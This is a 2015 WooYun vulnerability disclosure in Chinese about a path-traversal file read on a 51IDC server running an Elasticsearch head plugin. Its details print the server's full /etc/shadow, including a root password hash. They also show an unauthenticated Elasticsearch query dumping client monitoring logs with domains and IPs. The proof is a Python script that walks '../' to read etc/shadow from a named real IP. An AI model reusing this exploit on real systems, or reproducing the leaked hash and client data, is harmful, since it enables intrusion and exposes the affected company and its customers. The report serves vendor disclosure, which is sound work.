当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112618

漏洞标题:51IDC某处配置不当一枚造成任意文件读取

相关厂商:51IDC(安畅网络)

漏洞作者: izy

提交时间:2015-05-07 14:46

修复时间:2015-06-25 10:38

公开时间:2015-06-25 10:38

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-07: 细节已通知厂商并且等待厂商处理中
2015-05-11: 厂商已经确认,细节仅向厂商公开
2015-05-21: 细节向核心白帽子及相关领域专家公开
2015-05-31: 细节向普通白帽子公开
2015-06-10: 细节向实习白帽子公开
2015-06-25: 细节向公众公开

简要描述:

任意文件读取

详细说明:

ip来源:http://wooyun.org/bugs/wooyun-2010-0108219
直接读了shadow文件
root:$6$7gdIDbHJ$M3ozjM1jcGyxjwS7mKakC79OHIys7TchDKZ0KYOwYqruDBQsp2D3og/pam8rQecwxNGIUy8vZsCUtpspLLi3L1:16506:0:99999:7:::
bin:*:15513:0:99999:7:::
daemon:*:15513:0:99999:7:::
adm:*:15513:0:99999:7:::
lp:*:15513:0:99999:7:::
sync:*:15513:0:99999:7:::
shutdown:*:15513:0:99999:7:::
halt:*:15513:0:99999:7:::
mail:*:15513:0:99999:7:::
uucp:*:15513:0:99999:7:::
operator:*:15513:0:99999:7:::
games:*:15513:0:99999:7:::
gopher:*:15513:0:99999:7:::
ftp:*:15513:0:99999:7:::
nobody:*:15513:0:99999:7:::
dbus:!!:16506::::::
vcsa:!!:16506::::::
abrt:!!:16506::::::
haldaemon:!!:16506::::::
ntp:!!:16506::::::
saslauth:!!:16506::::::
postfix:!!:16506::::::
sshd:!!:16506::::::
tcpdump:!!:16506::::::
apache:!!:16506::::::
mysql:!!:16506::::::
izy@Macintosh:~$ curl http://58.215.139.37:9200/_search?pretty
{
"took" : 17,
"timed_out" : false,
"_shards" : {
"total" : 62,
"successful" : 62,
"failed" : 0
},
"hits" : {
"total" : 12634697,
"max_score" : 1.0,
"hits" : [ {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "TNBplZdJTku7WjZkIfjyAg",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.809Z","host":"127.0.0.1:49082","type":"datalog","status":1,"node_label":"网内节点","domain":"financecity.org","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"dns","sub_id":65,"data":"58.215.186.121","node_name":"NODE_LOCAL","token":"dns","time_add_unix":1426003201,"qvalue":"","dns_id":65,"dlabel":"金程国际financecity.org","glabel":"金程国际","group_id":54,"qtype":"A","domain_id":65,"time_total":9.943}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "AOkUKSZ1TPmdh77v4RAGiw",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.819Z","host":"127.0.0.1:49087","type":"datalog","status":1,"node_label":"网内节点","domain":"gfedu.net","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"dns","sub_id":66,"data":"58.215.186.122","node_name":"NODE_LOCAL","token":"dns","time_add_unix":1426003201,"qvalue":"","dns_id":66,"dlabel":"金程国际gfedu.net","glabel":"金程国际","group_id":54,"qtype":"A","domain_id":66,"time_total":11.96}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "7GE713ACSTi9Xgtv6pY3Nw",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.844Z","host":"127.0.0.1:49090","type":"datalog","status":1,"node_label":"网内节点","domain":"gpst.cn","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"ping","sub_id":37,"time_add_unix":1426003201,"node_name":"NODE_LOCAL","token":"ping","time_total":4.935,"ping_id":37,"dlabel":"上海华东人才gpst.cn","glabel":"上海华东人才","group_id":30,"domain_id":37,"errmsg":""}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "KoEfvHN7QyWqXh8l9RFhpw",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.862Z","host":"127.0.0.1:49091","type":"datalog","status":1,"node_label":"网内节点","domain":"www.lillyoncology.com.cn","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"ping","sub_id":32,"time_add_unix":1426003201,"node_name":"NODE_LOCAL","token":"ping","time_total":6.177,"ping_id":32,"dlabel":"礼来国际www.lillyoncology.com.cn","glabel":"礼来国际","group_id":23,"domain_id":32,"errmsg":""}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "fXEd4gQWQP2ymF8fMg7LFg",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.867Z","host":"127.0.0.1:49092","type":"datalog","status":1,"node_label":"网内节点","domain":"www.sunflowerclub.com.cn","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"ping","sub_id":33,"time_add_unix":1426003201,"node_name":"NODE_LOCAL","token":"ping","time_total":6.87,"ping_id":33,"dlabel":"礼来国际www.sunflowerclub.com.cn","glabel":"礼来国际","group_id":23,"domain_id":33,"errmsg":""}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "pI668m_vS6CvonzA18AFBg",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.867Z","host":"127.0.0.1:49094","type":"datalog","status":1,"node_label":"网内节点","domain":"www.huadong.cn","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"ping","sub_id":38,"time_add_unix":1426003201,"node_name":"NODE_LOCAL","token":"ping","time_total":7.537,"ping_id":38,"dlabel":"上海华东人才www.huadong.cn","glabel":"上海华东人才","group_id":30,"domain_id":38,"errmsg":""}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "-GgISu37T5qn6G7bnEe4CA",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.868Z","host":"127.0.0.1:49096","type":"datalog","status":1,"node_label":"网内节点","domain":"www.niwodai.com","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"dns","sub_id":4,"data":"61.160.209.154","node_name":"NODE_LOCAL","token":"dns","time_add_unix":1426003201,"qvalue":"","dns_id":4,"dlabel":"上海嘉银www.niwodai.com","glabel":"默认","group_id":1,"qtype":"A","domain_id":4,"time_total":13.463}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "_2OC78h4R5ONSZPZcwJ6aQ",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.868Z","host":"127.0.0.1:49095","type":"datalog","status":1,"node_label":"网内节点","domain":"www.louisfenysh.com","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"dns","sub_id":77,"data":"114.80.110.203","node_name":"NODE_LOCAL","token":"dns","time_add_unix":1426003201,"qvalue":"","dns_id":77,"dlabel":"上海欧晴www.louisfenysh.com","glabel":"上海欧睛","group_id":60,"qtype":"A","domain_id":77,"time_total":10.156}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "L4yFkCY9QNG6hr-q-za1nQ",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.868Z","host":"127.0.0.1:49097","type":"datalog","status":1,"node_label":"网内节点","domain":"www.huadong.net.cn","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"ping","sub_id":39,"time_add_unix":1426003201,"node_name":"NODE_LOCAL","token":"ping","time_total":8.239,"ping_id":39,"dlabel":"上海华东人才www.huadong.net.cn","glabel":"上海华东人才","group_id":30,"domain_id":39,"errmsg":""}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "bnYfZxh1Sv6XaRR9o7kvsw",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.872Z","host":"127.0.0.1:49109","type":"datalog","status":1,"node_label":"网内节点","domain":"0019.com","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"ping","sub_id":98,"time_add_unix":1426003201,"node_name":"NODE_LOCAL","token":"ping","time_total":7.146,"ping_id":98,"dlabel":"相亲相爱02","glabel":"济南相亲相爱","group_id":16,"domain_id":110,"errmsg":""}
} ]
}
}

漏洞证明:

#coding:utf8
import urllib,requests,re
url_raw="http://58.215.139.37:9200/_plugin/head/"
payload='../'
header={"Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3",
    "Content-Type": "application/x-www-form-urlencoded",
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:32.0) Gecko/20100101 Firefox/32.0",
    "Referer": "http://wooyun.org/bugs/wooyun-2015-111",
    "Cookie":"bdshare_firstime=1111; __cfduid=111; wy_uid=11%1111; wy_pwd=1111%2Bf2ibeQzUQb7y6mP%111; PHPSESSID=93fn61ajmu7opgbpvo06l4i0m0; Hm_lvt_c12f88b5c1cd041a732dea597a5ec94c=1427300078,1427300113,1427332423,1427693626; Hm_lpvt_c12f88b5c1cd041a732dea597a5ec94c=1427694217",
    "Connection": "keep-alive",}
_file='etc/shadow'
for i in range(20):
	url=url_raw+payload*i+_file
	r=requests.get(url,headers=header,timeout=3)
	print url.strip()
	print r.text

修复方案:

打补丁..

版权声明:转载请注明来源 izy@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-05-11 10:37

厂商回复:

感谢关注!已处理。

最新状态:

暂无